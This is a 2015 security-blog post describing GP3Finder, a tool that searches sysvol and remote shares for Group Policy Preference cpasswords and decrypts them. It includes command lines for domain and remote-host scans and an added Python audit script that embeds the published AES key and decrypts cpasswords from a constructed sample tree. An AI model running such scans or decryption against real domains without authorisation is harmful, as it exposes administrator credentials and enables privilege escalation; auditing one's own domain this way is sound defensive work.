Published on December 28th, 2015 | by MaxiSoler0
Group Policy Preferences Password Finder (GP3Finder) v4.0
Group Policy Preferences Password Finder (GP3Finder) searches for and decrypts passwords stored in Group Policy Preference items on the sysvol share of the domain controller, on the local host, or on any specified share of a remote host. It also decrypts a manually retrieved cpassword value.
Preference items are commonly seen configuring administrative account details, so this tool can often allow quick privilege escalation from user to domain administrator.
Note: MS14-025 prevents new preference items from being created with credentials, but it does not remove existing items.
Group Policy preferences were introduced by Microsoft in Windows 2008, allowing administrators to configure unmanaged settings (settings which the user can change) from a centrally managed location: Group Policy Objects (GPOs).
GP3Finder has been released open source under the GPL2 license.
This tool requires the following:
- PyWin32 (if running on Windows)
- Decrypt a given cpassword:
gp3finder.py -D CPASSWORD
The following commands write the decrypted cpasswords (from Groups.xml etc.) and a list of XML files that contain the word ‘password’ (for manual review) to a file (‘gp3finder.out’ by default; this can be changed with -o FILE).
- Find and decrypt cpasswords on domain controller automatically:
gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAIN\USER
Password: PASSWORD
Maps DOMAIN_CONTROLLER’s sysvol share with the given credentials.
- Find and decrypt cpasswords on the local machine automatically:
gp3finder.py -A -l
Searches through “C:\ProgramData\Microsoft\Group Policy\History” (by default); this can be changed with -lr PATH.
- Find and decrypt cpasswords on a remote host:
gp3finder.py -A -t HOST -u DOMAIN\USER -s C$ -rr "ProgramData\Microsoft\Group Policy\History"
- Find and decrypt cpasswords on hosts specified in a file (one per line):
gp3finder.py -A -f HOST_FILE -u DOMAIN\USER -s C$ -rr "ProgramData\Microsoft\Group Policy\History"
Note: the user this script is run as must have permission to map/mount shares if running against a remote host.
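The scan-and-decrypt workflow the commands above automate can be reproduced as a small audit script, which is useful for checking that a domain has no leftover preference items after MS14-025. The example below is added here and is not GP3Finder's own code: it walks a SYSVOL-style directory tree (a mounted sysvol share or the local Group Policy History folder), reports every preference element that still carries a cpassword attribute, and decrypts the value with the AES-256-CBC key Microsoft documents for Group Policy Preferences when pycryptodome is installed. The sample directory tree, file contents and cpassword value are constructed for the demonstration; the policy GUID is a placeholder.

```python
"""Audit a SYSVOL-style tree for Group Policy Preference items that still
carry a cpassword attribute (added example, not GP3Finder's code)."""
import base64
import os
import tempfile
import xml.etree.ElementTree as ET

# AES-256-CBC key Microsoft documents for Group Policy Preferences
# (MS-GPPREF, "Password Encryption"); the IV is sixteen zero bytes.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

try:  # pycryptodome is optional: without it the scan still reports exposure
    from Crypto.Cipher import AES
except ImportError:
    AES = None

# Preference XML files known to carry account credentials, mapped to the
# attribute that names the account in each file type.
ACCOUNT_ATTR = {
    "Groups.xml": "userName",
    "ScheduledTasks.xml": "runAs",
    "Services.xml": "accountName",
    "DataSources.xml": "username",
    "Drives.xml": "userName",
    "Printers.xml": "userName",
}


def restore_padding(cpassword):
    """cpassword is base64 with its '=' padding stripped; put it back."""
    return cpassword + "=" * (-len(cpassword) % 4)


def decrypt_cpassword(cpassword):
    """Decrypt a cpassword. Returns None when no AES library is installed or
    the value does not decrypt to a well-padded UTF-16LE string."""
    if AES is None:
        return None
    try:
        raw = base64.b64decode(restore_padding(cpassword))
        plain = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16).decrypt(raw)
        pad = plain[-1]
        if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
            return None  # bad PKCS#7 padding: not a genuine cpassword
        return plain[:-pad].decode("utf-16-le")
    except (ValueError, IndexError, UnicodeDecodeError):
        return None


def find_cpasswords(root_dir):
    """Walk root_dir and return one record per element carrying a cpassword."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            # SYSVOL is case-insensitive, so match file names case-insensitively
            kind = next((k for k in ACCOUNT_ATTR if k.lower() == name.lower()), None)
            if kind is None:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # malformed XML; worth a manual look but not a finding
            for elem in root.iter():
                cpassword = elem.get("cpassword")
                if cpassword is None:
                    continue
                findings.append({
                    "file": os.path.relpath(path, root_dir),
                    "account": elem.get(ACCOUNT_ATTR[kind]),
                    "cpassword": cpassword,
                    "password": decrypt_cpassword(cpassword),
                })
    return findings


# Constructed sample tree mimicking sysvol\<domain>\Policies\{GUID}\Machine\Preferences.
# The GUID is a placeholder and the cpassword is a constructed, base64-shaped value.
CONSTRUCTED_CPASSWORD = "A" * 43
_GPO = os.path.join("Policies", "{00000000-0000-0000-0000-000000000000}", "Machine", "Preferences")
SAMPLE_FILES = {
    os.path.join(_GPO, "Groups", "Groups.xml"):
        '<Groups><User name="localadmin"><Properties action="U" '
        'userName="localadmin" cpassword="' + CONSTRUCTED_CPASSWORD + '"/></User>'
        '<User name="renamed"><Properties action="U" newName="helpdesk"/></User></Groups>',
    os.path.join(_GPO, "Services", "Services.xml"):
        '<NTServices><NTService name="Backup"><Properties accountName="svc_backup" '
        'cpassword="' + CONSTRUCTED_CPASSWORD + '"/></NTService></NTServices>',
}


def build_sample_sysvol():
    """Write the constructed sample tree to a temp dir and return its path."""
    base = tempfile.mkdtemp(prefix="sysvol_sample_")
    for rel, xml in SAMPLE_FILES.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(xml)
    return base


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_sysvol()):
        shown = hit["password"] if hit["password"] is not None else "(not decrypted)"
        print(f"{hit['file']}: account={hit['account']} password={shown}")
```

Point `find_cpasswords` at a mounted sysvol share or at `C:\ProgramData\Microsoft\Group Policy\History` to audit a real tree; any record it returns is a preference item that should be deleted and its account's password rotated, whether or not the value decrypts. The second user in the sample Groups.xml shows that items without a cpassword attribute (a plain rename) are not reported.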
Additional Options: --help
Thanks to Oliver Morton, for sharing this tool with us. 😉